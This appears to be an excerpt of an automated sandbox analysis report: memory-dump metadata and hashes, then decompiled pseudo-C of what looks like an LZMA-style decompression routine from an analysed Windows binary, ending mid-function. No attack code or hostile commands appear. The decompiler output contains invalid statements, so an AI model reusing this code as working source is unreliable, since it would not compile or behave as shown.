                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                                                                                                                                                                              • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406776(void* __ecx) {
                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				unsigned int _v20;
                                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                                              				signed int _v32;
                                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                                                              				signed int _v52;
                                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                                              				signed int _v64;
                                                                                                                                                                                                              				signed int _v68;
                                                                                                                                                                                                              				signed int _v72;
                                                                                                                                                                                                              				signed int _v76;
                                                                                                                                                                                                              				signed int _v80;
                                                                                                                                                                                                              				signed int _v84;
                                                                                                                                                                                                              				signed int _v88;
                                                                                                                                                                                                              				signed int _v92;
                                                                                                                                                                                                              				signed int _v95;
                                                                                                                                                                                                              				signed int _v96;
                                                                                                                                                                                                              				signed int _v100;
                                                                                                                                                                                                              				signed int _v104;
                                                                                                                                                                                                              				signed int _v108;
                                                                                                                                                                                                              				signed int _v112;
                                                                                                                                                                                                              				signed int _v116;
                                                                                                                                                                                                              				signed int _v120;
                                                                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                                                                              				signed int _v128;
                                                                                                                                                                                                              				signed int _v132;
                                                                                                                                                                                                              				signed int _v136;
                                                                                                                                                                                                              				void _v140;
                                                                                                                                                                                                              				void* _v148;
                                                                                                                                                                                                              				signed int _t537;
                                                                                                                                                                                                              				signed int _t538;
                                                                                                                                                                                                              				signed int _t572;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t572 = 0x22;
                                                                                                                                                                                                              				_v148 = __ecx;
                                                                                                                                                                                                              				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                                                                                                              				if(_v52 == 0xffffffff) {
                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                              					_t537 = _v140;
                                                                                                                                                                                                              					if(_t537 > 0x1c) {
                                                                                                                                                                                                              						break;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              						case 0:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v116 = _v116 + 1;
                                                                                                                                                                                                              							_t537 =  *_v116;
                                                                                                                                                                                                              							__eflags = _t537 - 0xe1;
                                                                                                                                                                                                              							if(_t537 > 0xe1) {
                                                                                                                                                                                                              								goto L174;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t542 = _t537 & 0x000000ff;
                                                                                                                                                                                                              							_push(0x2d);
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_pop(_t576);
                                                                                                                                                                                                              							_push(9);
                                                                                                                                                                                                              							_pop(_t577);
                                                                                                                                                                                                              							_t622 = _t542 / _t576;
                                                                                                                                                                                                              							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                                                                                                              							_v64 = _t617;
                                                                                                                                                                                                              							_v32 = (1 << _t622) - 1;
                                                                                                                                                                                                              							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                                                                                                              							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                                                                                                              							__eflags = 0x600 - _v124;
                                                                                                                                                                                                              							if(0x600 == _v124) {
                                                                                                                                                                                                              								L12:
                                                                                                                                                                                                              								__eflags = _t625;
                                                                                                                                                                                                              								if(_t625 == 0) {
                                                                                                                                                                                                              									L14:
                                                                                                                                                                                                              									_v76 = _v76 & 0x00000000;
                                                                                                                                                                                                              									_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                              									goto L17;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L13;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									L13:
                                                                                                                                                                                                              									_t625 = _t625 - 1;
                                                                                                                                                                                                              									__eflags = _t625;
                                                                                                                                                                                                              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                                                                                                              								} while (_t625 != 0);
                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v8;
                                                                                                                                                                                                              							if(_v8 != 0) {
                                                                                                                                                                                                              								GlobalFree(_v8);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              							__eflags = _t537;
                                                                                                                                                                                                              							_v8 = _t537;
                                                                                                                                                                                                              							if(_t537 == 0) {
                                                                                                                                                                                                              								goto L174;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v124 = 0x600;
                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 1:
                                                                                                                                                                                                              							L15:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 1;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                                                                                                              							_v116 = _v116 + 1;
                                                                                                                                                                                                              							_t50 =  &_v76;
                                                                                                                                                                                                              							 *_t50 = _v76 + 1;
                                                                                                                                                                                                              							__eflags =  *_t50;
                                                                                                                                                                                                              							L17:
                                                                                                                                                                                                              							__eflags = _v76 - 4;
                                                                                                                                                                                                              							if(_v76 < 4) {
                                                                                                                                                                                                              								goto L15;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t550 = _v68;
                                                                                                                                                                                                              							__eflags = _t550 - _v120;
                                                                                                                                                                                                              							if(_t550 == _v120) {
                                                                                                                                                                                                              								L22:
                                                                                                                                                                                                              								_v76 = 5;
                                                                                                                                                                                                              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                                                                                                              								goto L25;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v12;
                                                                                                                                                                                                              							_v120 = _t550;
                                                                                                                                                                                                              							if(_v12 != 0) {
                                                                                                                                                                                                              								GlobalFree(_v12);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                                                                                                              							__eflags = _t537;
                                                                                                                                                                                                              							_v12 = _t537;
                                                                                                                                                                                                              							if(_t537 == 0) {
                                                                                                                                                                                                              								goto L174;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 2:
                                                                                                                                                                                                              							L26:
                                                                                                                                                                                                              							_t557 = _v100 & _v32;
                                                                                                                                                                                                              							_v136 = 6;
                                                                                                                                                                                                              							_v80 = _t557;
                                                                                                                                                                                                              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                                                                                                              							goto L135;
                                                                                                                                                                                                              						case 3:
                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 3;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_t72 =  &_v116;
                                                                                                                                                                                                              							 *_t72 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t72;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							L25:
                                                                                                                                                                                                              							_v76 = _v76 - 1;
                                                                                                                                                                                                              							__eflags = _v76;
                                                                                                                                                                                                              							if(_v76 != 0) {
                                                                                                                                                                                                              								goto L23;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L26;
                                                                                                                                                                                                              						case 4:
                                                                                                                                                                                                              							L136:
                                                                                                                                                                                                              							_t559 =  *_t626;
                                                                                                                                                                                                              							_t610 = _t559 & 0x0000ffff;
                                                                                                                                                                                                              							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                                                                                                              							__eflags = _v16 - _t591;
                                                                                                                                                                                                              							if(_v16 >= _t591) {
                                                                                                                                                                                                              								_v20 = _v20 - _t591;
                                                                                                                                                                                                              								_v16 = _v16 - _t591;
                                                                                                                                                                                                              								_v68 = 1;
                                                                                                                                                                                                              								_t560 = _t559 - (_t559 >> 5);
                                                                                                                                                                                                              								__eflags = _t560;
                                                                                                                                                                                                              								 *_t626 = _t560;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v20 = _t591;
                                                                                                                                                                                                              								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              								goto L142;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L140;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 5:
                                                                                                                                                                                                              							L140:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 5;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_t464 =  &_v116;
                                                                                                                                                                                                              							 *_t464 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t464;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							L142:
                                                                                                                                                                                                              							_t561 = _v136;
                                                                                                                                                                                                              							goto L143;
                                                                                                                                                                                                              						case 6:
                                                                                                                                                                                                              							__edx = 0;
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								__eax = _v8;
                                                                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                                                                              								_v56 = 1;
                                                                                                                                                                                                              								_v136 = 7;
                                                                                                                                                                                                              								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                                                                                                              								goto L135;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v96 & 0x000000ff;
                                                                                                                                                                                                              							__esi = _v100;
                                                                                                                                                                                                              							__cl = 8;
                                                                                                                                                                                                              							__cl = 8 - _v64;
                                                                                                                                                                                                              							__esi = _v100 & _v28;
                                                                                                                                                                                                              							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                                                                                                              							__ecx = _v64;
                                                                                                                                                                                                              							__esi = (_v100 & _v28) << 8;
                                                                                                                                                                                                              							__ecx = _v8;
                                                                                                                                                                                                              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                                                                                                              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                                                                                                              							__eflags = _v60 - 4;
                                                                                                                                                                                                              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                                                              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                                                                                                              							if(_v60 >= 4) {
                                                                                                                                                                                                              								__eflags = _v60 - 0xa;
                                                                                                                                                                                                              								if(_v60 >= 0xa) {
                                                                                                                                                                                                              									_t103 =  &_v60;
                                                                                                                                                                                                              									 *_t103 = _v60 - 6;
                                                                                                                                                                                                              									__eflags =  *_t103;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_v60 = _v60 - 3;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v60 = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v56 - __edx;
                                                                                                                                                                                                              							if(_v56 == __edx) {
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								__ebx = 1;
                                                                                                                                                                                                              								goto L63;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v24;
                                                                                                                                                                                                              							__eax = _v24 - _v48;
                                                                                                                                                                                                              							__eflags = __eax - _v120;
                                                                                                                                                                                                              							if(__eax >= _v120) {
                                                                                                                                                                                                              								__eax = __eax + _v120;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v12;
                                                                                                                                                                                                              							__ebx = 0;
                                                                                                                                                                                                              							__ebx = 1;
                                                                                                                                                                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              							goto L43;
                                                                                                                                                                                                              						case 7:
                                                                                                                                                                                                              							__eflags = _v68 - 1;
                                                                                                                                                                                                              							if(_v68 != 1) {
                                                                                                                                                                                                              								__eax = _v40;
                                                                                                                                                                                                              								_v132 = 0x16;
                                                                                                                                                                                                              								_v36 = _v40;
                                                                                                                                                                                                              								__eax = _v44;
                                                                                                                                                                                                              								_v40 = _v44;
                                                                                                                                                                                                              								__eax = _v48;
                                                                                                                                                                                                              								_v44 = _v48;
                                                                                                                                                                                                              								__eax = 0;
                                                                                                                                                                                                              								__eflags = _v60 - 7;
                                                                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								__eax = _v8;
                                                                                                                                                                                                              								__eax = _v8 + 0x664;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								_v92 = __eax;
                                                                                                                                                                                                              								goto L71;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v8;
                                                                                                                                                                                                              							__ecx = _v60;
                                                                                                                                                                                                              							_v136 = 8;
                                                                                                                                                                                                              							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                                                                                                              							goto L135;
                                                                                                                                                                                                              						case 8:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								__eax = _v8;
                                                                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                                                                              								_v136 = 0xa;
                                                                                                                                                                                                              								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax = _v60;
                                                                                                                                                                                                              								__ecx = _v8;
                                                                                                                                                                                                              								__eax = _v60 + 0xf;
                                                                                                                                                                                                              								_v136 = 9;
                                                                                                                                                                                                              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                                                                                                              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L135;
                                                                                                                                                                                                              						case 9:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								goto L92;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v100;
                                                                                                                                                                                                              							if(_v100 == 0) {
                                                                                                                                                                                                              								goto L174;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                                                              							__eflags = _v60 - 7;
                                                                                                                                                                                                              							_t264 = _v60 - 7 >= 0;
                                                                                                                                                                                                              							__eflags = _t264;
                                                                                                                                                                                                              							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                                                                                                              							_v60 = _t264 + _t264 + 9;
                                                                                                                                                                                                              							goto L78;
                                                                                                                                                                                                              						case 0xa:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								__eax = _v8;
                                                                                                                                                                                                              								__ecx = _v60;
                                                                                                                                                                                                              								_v136 = 0xb;
                                                                                                                                                                                                              								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                                                                                                              								goto L135;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = _v44;
                                                                                                                                                                                                              							goto L91;
                                                                                                                                                                                                              						case 0xb:
                                                                                                                                                                                                              							__eflags = _v68;
                                                                                                                                                                                                              							if(_v68 != 0) {
                                                                                                                                                                                                              								__ecx = _v40;
                                                                                                                                                                                                              								__eax = _v36;
                                                                                                                                                                                                              								_v36 = _v40;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax = _v40;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v44;
                                                                                                                                                                                                              							_v40 = _v44;
                                                                                                                                                                                                              							L91:
                                                                                                                                                                                                              							__ecx = _v48;
                                                                                                                                                                                                              							_v48 = __eax;
                                                                                                                                                                                                              							_v44 = _v48;
                                                                                                                                                                                                              							L92:
                                                                                                                                                                                                              							__eax = _v8;
                                                                                                                                                                                                              							_v132 = 0x15;
                                                                                                                                                                                                              							__eax = _v8 + 0xa68;
                                                                                                                                                                                                              							_v92 = _v8 + 0xa68;
                                                                                                                                                                                                              							goto L71;
                                                                                                                                                                                                              						case 0xc:
                                                                                                                                                                                                              							L102:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0xc;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t340 =  &_v116;
                                                                                                                                                                                                              							 *_t340 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t340;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							__eax = _v48;
                                                                                                                                                                                                              							goto L104;
                                                                                                                                                                                                              						case 0xd:
                                                                                                                                                                                                              							L39:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0xd;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t127 =  &_v116;
                                                                                                                                                                                                              							 *_t127 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t127;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							L41:
                                                                                                                                                                                                              							__eax = _v68;
                                                                                                                                                                                                              							__eflags = _v76 - _v68;
                                                                                                                                                                                                              							if(_v76 != _v68) {
                                                                                                                                                                                                              								goto L50;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                                                                              								goto L56;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L43:
                                                                                                                                                                                                              							__eax = _v95 & 0x000000ff;
                                                                                                                                                                                                              							_v95 = _v95 << 1;
                                                                                                                                                                                                              							__ecx = _v92;
                                                                                                                                                                                                              							__eax = (_v95 & 0x000000ff) >> 7;
                                                                                                                                                                                                              							_v76 = __eax;
                                                                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                                                                              							__esi = _v92 + __eax * 2;
                                                                                                                                                                                                              							_v20 = _v20 >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = (_v20 >> 0xb) * __edx;
                                                                                                                                                                                                              							__eflags = _v16 - __ecx;
                                                                                                                                                                                                              							if(_v16 >= __ecx) {
                                                                                                                                                                                                              								_v20 = _v20 - __ecx;
                                                                                                                                                                                                              								_v16 = _v16 - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								_v68 = 1;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v68 = _v68 & 0x00000000;
                                                                                                                                                                                                              								_v20 = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              							_v72 = __ebx;
                                                                                                                                                                                                              							if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              								goto L41;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0xe:
                                                                                                                                                                                                              							L48:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0xe;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t161 =  &_v116;
                                                                                                                                                                                                              							 *_t161 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t161;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								L50:
                                                                                                                                                                                                              								__eflags = __ebx - 0x100;
                                                                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                                                                              									break;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eax = _v92;
                                                                                                                                                                                                              								__edx = __ebx + __ebx;
                                                                                                                                                                                                              								__ecx = _v20;
                                                                                                                                                                                                              								__esi = __edx + __eax;
                                                                                                                                                                                                              								__ecx = _v20 >> 0xb;
                                                                                                                                                                                                              								__ax =  *__esi;
                                                                                                                                                                                                              								_v88 = __esi;
                                                                                                                                                                                                              								__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              								__ecx = (_v20 >> 0xb) * __edi;
                                                                                                                                                                                                              								__eflags = _v16 - __ecx;
                                                                                                                                                                                                              								if(_v16 >= __ecx) {
                                                                                                                                                                                                              									_v20 = _v20 - __ecx;
                                                                                                                                                                                                              									_v16 = _v16 - __ecx;
                                                                                                                                                                                                              									__cx = __ax;
                                                                                                                                                                                                              									_t175 = __edx + 1; // 0x1
                                                                                                                                                                                                              									__ebx = _t175;
                                                                                                                                                                                                              									__cx = __ax >> 5;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              									 *__esi = __ax;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									_v20 = __ecx;
                                                                                                                                                                                                              									0x800 = 0x800 - __edi;
                                                                                                                                                                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              									__ebx = __ebx + __ebx;
                                                                                                                                                                                                              									 *__esi = __cx;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                              								_v72 = __ebx;
                                                                                                                                                                                                              								if(_v20 >= 0x1000000) {
                                                                                                                                                                                                              									continue;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L48;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L56:
                                                                                                                                                                                                              							_t178 =  &_v56;
                                                                                                                                                                                                              							 *_t178 = _v56 & 0x00000000;
                                                                                                                                                                                                              							__eflags =  *_t178;
                                                                                                                                                                                                              							goto L57;
                                                                                                                                                                                                              						case 0xf:
                                                                                                                                                                                                              							L60:
                                                                                                                                                                                                              							__eflags = _v112;
                                                                                                                                                                                                              							if(_v112 == 0) {
                                                                                                                                                                                                              								_v140 = 0xf;
                                                                                                                                                                                                              								goto L173;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = _v116;
                                                                                                                                                                                                              							__eax = _v16;
                                                                                                                                                                                                              							_v20 = _v20 << 8;
                                                                                                                                                                                                              							__ecx =  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_v112 = _v112 - 1;
                                                                                                                                                                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							_t208 =  &_v116;
                                                                                                                                                                                                              							 *_t208 = _v116 + 1;
                                                                                                                                                                                                              							__eflags =  *_t208;
                                                                                                                                                                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                                                                                                              							L62:
                                                                                                                                                                                                              							__eflags = __ebx - 0x100;
                                                                                                                                                                                                              							if(__ebx >= 0x100) {
                                                                                                                                                                                                              								L57:
                                                                                                                                                                                                              								__al = _v72;
                                                                                                                                                                                                              								_v96 = _v72;
                                                                                                                                                                                                              								goto L58;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L63:
                                                                                                                                                                                                              							__eax = _v92;
                                                                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                                                                              							__ecx = _v20;
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							__ecx = _v20 >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							_v88 = __esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
